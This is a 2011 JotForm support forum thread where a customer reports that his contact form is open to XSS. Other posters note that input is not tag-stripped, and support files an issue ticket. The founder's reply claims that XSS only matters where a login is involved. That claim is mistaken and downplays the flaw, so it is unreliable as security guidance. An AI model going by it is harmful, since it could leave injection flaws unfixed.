What is JotForm?
JotForm is a free online form builder which helps you create online forms without writing a single line of code. No sign-up required.

At JotForm, we want to make sure that you’re getting the online form builder help that you need. Our friendly customer support team is available 24/7.

We believe that if one user has a question, there could be more users who may have the same question. This is why many of our support forum threads are public and available to be searched and viewed. If you’d like help immediately, feel free to search for a similar question, or submit your question or concern.


  • Profile Image

    I've been informed, by a close friend (and internet security expert)

    Asked by Michael Wood on May 13, 2011 at 01:01 PM

    I've been informed, by a close friend (and internet security expert), that the 'Contact Us' form on my website (www.rmxdp.co.uk) is open to XSS attacks. What can be done about it?


    I wanted to take the commercial option by paying, instead of taking the free option. But now, I'm not so sure.


    Yours, Michael - RMXDP.

    Page URL:
    http://dl.dropbox.com/u/1224626/RMXDP%20site/Here/Remix_D%26P/Contact_<br/>Us.html

  • Profile Image
    JotForm Founder

    Answered by aytekin on May 13, 2011 at 03:14 PM

    Can he make a XSS attack and show us what he means? Because it does not makes sense to me. Those attacks are made when you need to login to an account. On a simple contact form, exactly what do you attack? 

     

  • Profile Image

    Answered by Anon. on May 13, 2011 at 03:36 PM

    User input is not being tag stripped.

  • Profile Image

    Answered by Anon. on May 13, 2011 at 03:37 PM

    User input is not being tag stripped.

  • Profile Image
    JotForm Support

    Answered by NeilVicente on May 14, 2011 at 12:02 AM

    @Anon.

    I've taken notice of that. I'm not sure though how that could be a problem. Submissions are displayed in the submissions page and reports anyway, so unless an individual has access to those submissions there is nothing good that they can get out of it.  But of course, a clever hacker with a twisted mind can probably find a way to use this vulnerability to his advantage. With that in mind, I have included these notes in the report ticket I submitted for this issue.

    Thank you for your input. We appreciate it.


    Neil